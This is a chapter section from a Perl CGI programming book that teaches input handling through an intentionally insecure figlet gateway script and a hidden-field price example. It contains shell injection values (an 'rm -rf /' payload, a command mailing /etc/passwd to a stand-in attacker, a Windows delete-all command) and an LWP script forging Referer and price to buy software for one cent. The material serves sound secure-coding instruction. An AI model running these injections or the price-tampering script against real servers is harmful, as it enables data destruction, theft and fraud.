Handling User Input (CGI Programming with Perl)

8.2. Handling User Input

Security problems arise when you make assumptions about your data: you assume that users will do what you expect, and they surprise you. Users are good at this, even when they're not trying. To write secure CGI scripts, you must also think creatively. Let's look at an example.

8.2.1. Calling External Applications

figlet is a fun application that allows us to create large, fancy ASCII art characters in many different sizes and styles. You can find examples of figlet output as part of people's signatures in email messages and newsgroup posts. If figlet is not on your system, you can get it from http://st-www.cs.uiuc.edu/users/chai/figlet.html.

You can execute figlet from the command line in the following manner:

$ figlet -f fonts/slant 'I Love CGI!'

And the output would be:

____   __                       ______________________
   /  _/  / /   ____ _   _____     / ____/ __  _  _/  _/ /
   / /   / /   / _  _ \ | / / _ \   / /   / / _  _ / // /
 _/ /   / /___/ /_/ / |/ /  __/  / /_  _  _/ /_/ // //_/
/___/  /_____/\____/|___/\___/   \____/\____/_  _  _(_)

We can write a CGI gateway to figlet that allows a user to enter some text, executes a command like the one shown above, captures the output, and returns it to the browser.

First, Example 8-1 shows the HTML form.

Example 8-1. figlet.html

<html>
  <head>
    <title>Figlet Gateway</title>
  </head>
  
  <body bgcolor="#FFFFFF">
    
    <div align="center">
    <h2>Figlet Gateway</h2>
    
    <form action="/cgi/unsafe/figlet_INSECURE.cgi" method="GET">
      <p>Please enter a string to pass to figlet:
        <input type="text" name="string"></p>
      <input type="submit">
    </form>
  
  </body>
</html>

Now, Example 8-2 shows the program.

Example 8-2. figlet_INSECURE.cgi

#!/usr/bin/perl -w

use strict;
use CGI;
use CGIBook::Error;

# Constant: path to figlet
my $FIGLET = '/usr/local/bin/figlet';

my $q      = new CGI;
my $string = $q->param( "string" );

unless ( $string ) {
    error( $q, "Please enter some text to display." );
}

local *PIPE;

## This code is INSECURE...
## Do NOT use this code on a live web server!!
open PIPE, "$FIGLET \"$string\" |" or
    die "Cannot open pipe to figlet: $!";

print $q->header( "text/plain" );
print while <PIPE>;
close PIPE;

We first verify that the user entered a string and simply print an error if not. Then we open a pipe (notice the trailing "|"character) to the figlet command, passing it the string. By opening a pipe to another application, we can read from it as though it is a file. In this case, we can get at the figlet output by simply reading from the PIPE file handle.

We then print our content type, followed by the figlet output. Perl lets us do this on one line: the while loop reads a line from PIPE, stores it in $_, and calls print; when print is called without an argument, it will output the value stored in $_; the loop automatically terminates when all the data has been read from figlet.

Admittedly, our example is somewhat dull. figlet has many options for changing the font, etc., but we want to keep our example short and simple to be able to focus on the security issues. Many people assume that it's hard for something to go wrong with scripts this simple. In fact, this CGI script allows a savvy user to execute any command on your system!

Before reading further, see if you can figure out how this example is insecure. Remember that your commands are executed with the same permissions that your web server runs as (e.g., nobody). If you want to test it on a web server, then only do so on a private web server that is not attached to the Internet! Finally, try to figure out how to fix this security problem.

The reason why we suggest that you try to find the solution yourself is that there are many possible solutions that appear secure but are not. Before we look at the solutions, let's analyze the problem. It should have been pretty obvious (if only from the comments in the code), that the culprit is the call that opens a pipe to figlet. Why is this insecure? Well, it isn't if the user does in fact pass simple words without punctuation. But if you assume this then you would be forgetting our rule: never trust any data from the user.

8.2.2. User Input and the Shell

You should not assume this field will contain harmless data. It could be anything. When Perl opens a pipe to an external program, it passes the command through a shell. Suppose the input were the text:

`rm -rf /`

or:

"; mail cracker@badguys.net </etc/passwd"

These commands would execute as if the following commands had been entered into a shell:

$ /usr/local/bin/figlet "`rm -rf /`"
$ /usr/local/bin/figlet ""; mail cracker@badguys.net </etc/passwd

The first command would attempt to erase every file on your server, leaving you to search for your backup tapes.[13] The second would email your system password file to someone you'd probably rather not have trying to log into your system. Windows servers are no better off; the input "| del /f /s /q c:\" would be just as catastrophic.

[13]This example shows you why it is important to create a special user like nobody to run your web server and why this user should own as few files as possible. See Chapter 1, "Getting Started "

So what should we do? Well, the main problem is that the shell gives many characters special meaning. For example, the backtick character (`) allows you to embed one command inside another. This makes the shell powerful, but in this context, that power is dangerous. We could attempt to make a list of all the special characters. We would need to include all the characters that can cause other commands to run, that change the environment in significant ways, or terminate our intended commands and allow another command to follow.

We could change the code as follows:

my $q      = new CGI;
my $string = $q->param( "string" );
unless ( $string ) {
    error( $q, "Please enter some text to display." );
}

## This is an incomplete example; this is NOT a secure check
if ( $string =~ /[`\$\\"';& ...  ] ) {
    error( $q,
        "Your text may not include these characters: `\$\\\"';& ..." );
}

This example is not complete, and we will not provide a full list of dangerous characters here. We won't create such a list because we do not trust that we will not miss something important, and that is why this is the wrong way to go about solving the problem. This solution requires you to know every possible way that the shell can execute a dangerous command. If you miss just one thing, you can be compromised.

8.2.3. Security Strategies

The right way is not to make a list of what to disallow. The right way is to make a list of what to allow. This makes the solution much more manageable. If you start by saying that anything goes and looking for those things that cause problems, you will spend a long time looking. There are countless combinations to check. If you say that nothing goes and then slowly add things, you can check each of these as you add them and confirm that nothing will slip past you. If you miss something, you have disallowed something you should allow, and you can correct the problem by testing it and adding it. This is a much safer way to error.

The final reason why this is the safer way to go is that security solutions should be simple. It's never a good idea to simply trust someone else who provides you a "definitive" list of something as important as dangerous shell characters to check against. You are the one who is accountable for your code, so you should fully understand why and how your code works, and not place blind faith in others.

So let's make a list of things to allow. We will allow letters, numbers, underscores, spaces, hyphens, periods, question marks, and exclamation points. That's a lot, and it should cover most of the strings that users try to convert. Let's also switch to single quotes around the argument to make things even safer. Example 8-3 provides a more secure version of our CGI script.

Example 8-3. figlet_INSECURE2.cgi

#!/usr/bin/perl -w

use strict;
use CGI;
use CGIBook::Error;

my $FIGLET = '/usr/local/bin/figlet';

my $q      = new CGI;
my $string = $q->param( "string" );

unless ( $string ) {
    error( $q, "Please enter some text to display." );
}

unless ( $string =~ /^[\w .!?-]+$/ ) {
    error( $q, "You entered an invalid character. " .
               "You may only enter letters, numbers, " .
               "underscores, spaces, periods, exclamation " .
               "points, question marks, and hyphens." );
}
local *PIPE;

## This code is more secure, but still dangerous...
## Do NOT use this code on a live web server!!
open PIPE, "$FIGLET '$string' |" or
    die "Cannot open figlet: $!";

print $q->header( "text/plain" );
print while <PIPE>;
close PIPE;

This code is much better. It isn't dangerous in its current form. The only problem is that someone can come along at some later point and make minor changes that could render the script insecure again. Of course, we can't cover every possibility -- we have to draw the line somewhere. So are we being too critical to say the script could be more secure? Perhaps, but it always best to be safer rather than sorry when dealing with web security. We can improve this script because there is a way to open a pipe to another process in Perl and bypass the shell altogether. All right, you say, so why didn't we say so in the first place? Unfortunately, this trick only works on those operating systems where Perl can fork, so this does not work on Win32 [14] or MacOS, for example.

[14]As this book was going to press, the most recent versions of ActiveState Perl supported fork on Win32.

8.2.4. fork and exec

All we need to do is replace the command that opens the pipe with the following lines:

## Ahh, much safer
my $pid = open PIPE, "-|";
die "Cannot fork $!" unless defined $pid;

unless ( $pid ) {
    exec FIGLET, $string or die "Cannot open pipe to figlet: $!";
}

This uses a special form of the open function, which implicitly tells Perl to fork and create a child process with a pipe connected to it. The child process is a copy of the current executing script and continues from the same point. However, open returns a different value for each of the forked processes: the parent receives the process identifier (PID) of the child process; the child process receives 0. If open fails to fork, it returns undef.

After verifying that the command succeeded, the child process calls exec to run figlet. exec tells Perl to replace the child process with figlet, while keeping the same environment including the pipe to the parent process. Thus, the child process becomes figlet and the parent keeps a pipe to figlet, just as if it had used the simpler open command from above.

This is obviously a little more complicated. So why all this work if we still have to call figlet from exec? Well, if you look closely, you'll notice that exec takes multiple arguments in this script. The first argument is the name of the process to run, and the remaining arguments are passed as arguments to the new process, but Perl does this without passing them through the shell. Thus, by making our code a little more complex, we can avoid a big security problem.

8.2.5. Trusting the Browser

Let's look at another common security mistake in CGI scripts. You may think that the only data coming from the user you have to validate is the data they are allowed to edit. For example, you might think that data embedded in hidden fields or select lists is safer than data in text fields because the browser doesn't allow users to edit them. Actually, these can be just as dangerous. Let's see why.

In this example, we'll look at a simple online software store. Here, each product has its own static HTML page and each page calls the same CGI script to processes the transaction. In order to make the CGI script as flexible as possible, it takes the product name, quantity, and price from hidden fields in the product page. It then collects the user's credit card information, charges the card for the full amount, and allows the user to download the software.

Example 8-4 shows a sample product page.

Example 8-4. sb3000_INSECURE.html

<html>
  <head>
    <title>Super Blaster 3000</title>
  </head>
  
  <body bgcolor="#FFFFFF">
    <h2>Super Blaster 3000</h2>
    <hr>
    
    <form action="https://localhost/cgi/buy.cgi" method="GET">
      <input type="hidden" name="price" value="30.00">
      <input type="hidden" name="name" value="Super Blaster 3000">
      
      <p>Experience Super Blaster 3000, the hot new game that 
        everyone is talking about! You can't find it in stores, so
        order your copy here today. Just a quick download and you 
        can be playing it all night!</p>
      
      <p>The price is $30.00 (USD) per license. Enter the number
        of licenses you want, then click the <i>Order</i> button to 
        enter your order information.</p>
      
      <p>Number of Licenses: 
        <input type="text" name="quantity" value="1" size="8"></p>
      <input type="submit" name="submit" value="Order">
      
    </form>
  </body>
</html>

We don't need to look at the CGI script in this example, because the problem isn't what it does, it's how it's called. For now, we're interested in the form, and the security problem here is the price. The price is in a hidden field, so the form should not allow users to change the price. You may have noticed, however, that because the form is submitted via GET, the parameters will be clearly visible in the URL in your browser window. The previous example with one license generates the following URL (ignore the line break):

https://localhost/cgi/buy.cgi?price=30.00&
name=Super+Blaster+3000&quantity=1&submit=Order

By modifying this URL, it is possible to change the price to anything and call the CGI script with this new value.

Do not be deceived into thinking that you can solve this problem by changing the request method to POST. Many web developers use POST even when it is not appropriate (see GET and POST in Section 2.3, "Browser Requests") because they believe it makes their scripts more secure against URL tampering. This is false security. First of all, CGI.pm, like most modules that parse form input, does not differentiate between data obtained via POST or GET. Just because you change your form to call the script via POST does not mean that the user cannot manually construct a query string to call your script via GET instead. To prevent this, you could insert code like this:

unless ( $ENV{REQUEST_METHOD} eq "POST" ) {
    error( $q, "Invalid request method." );
}

However, the user can always copy your form to their own system. Then they can change the price to be an editable text field in their copy of the form and submit it to your CGI. Nothing inherent to HTTP prevents an HTML form on one server from calling a CGI script on another server. In fact, a CGI script can not reliably determine what form was used to submit data to it. Many web developers attempt to use the HTTP_REFERER environment variable to check where form input came from. You can do so like this:

my $server = quotemeta( $ENV{HTTP_HOST} || $ENV{SERVER_NAME} );
unless ( $ENV{HTTP_REFERER} =~ m|^https?://$server/| ) {
    error( $q, "Invalid referring URL." );
}

The problem here is that you have gone from trusting the user to trusting the user's browser. Don't do this. If the user is surfing with Netscape or Internet Explorer, you may be okay. It is possible that a bug could cause the browser to send the wrong referring URL, but this is unlikely. However, whoever said that users had to use one of these browsers?

There are many web browsers available, and some are far more configurable than Netscape and Internet Explorer. Did you know that Perl even has its own web client of sorts? The LWP module allows you to create and send HTTP requests easily from within Perl. The requests are fully customizable, so you can include whatever HTTP headers you wish, including Referer and User-Agent. The following code would allow someone to easily bypass all the security checks we've listed earlier:

#!/usr/bin/perl -w

use strict;

use LWP::UserAgent;
use HTTP::Request;
use HTTP::Headers;
use CGI;

my $q = new CGI( {
    price    => 0.01,
    name     => "Super Blaster 3000",
    quantity => 1,
    submit   => "Order",
} );

my $form_data = $q->query_string;

my $headers = new HTTP::Headers(
    Accept       => "text/html, text/plain, image/*",
    Referer      => "http://localhost/products/sb3000.html",
    Content_Type => "application/x-www-form-urlencoded"
);

my $request = new HTTP::Request(
    "POST",
    "http://localhost/cgi/feedback.cgi",
    $headers
);

$request->content( $form_data );

my $agent = new LWP::UserAgent;
$agent->agent( "Mozilla/4.5" );
my $response = $agent->request( $request );

print $response->content;

We're not going to review how this code works now, although we'll discuss LWP in Chapter 14, "Middleware and XML". Right now, the important thing to understand is that you can't trust any data that comes from the user, and you can't trust the browser to protect you from the user. It's trivially easy for someone with a little knowledge and a little ingenuity to provide you with any input they want.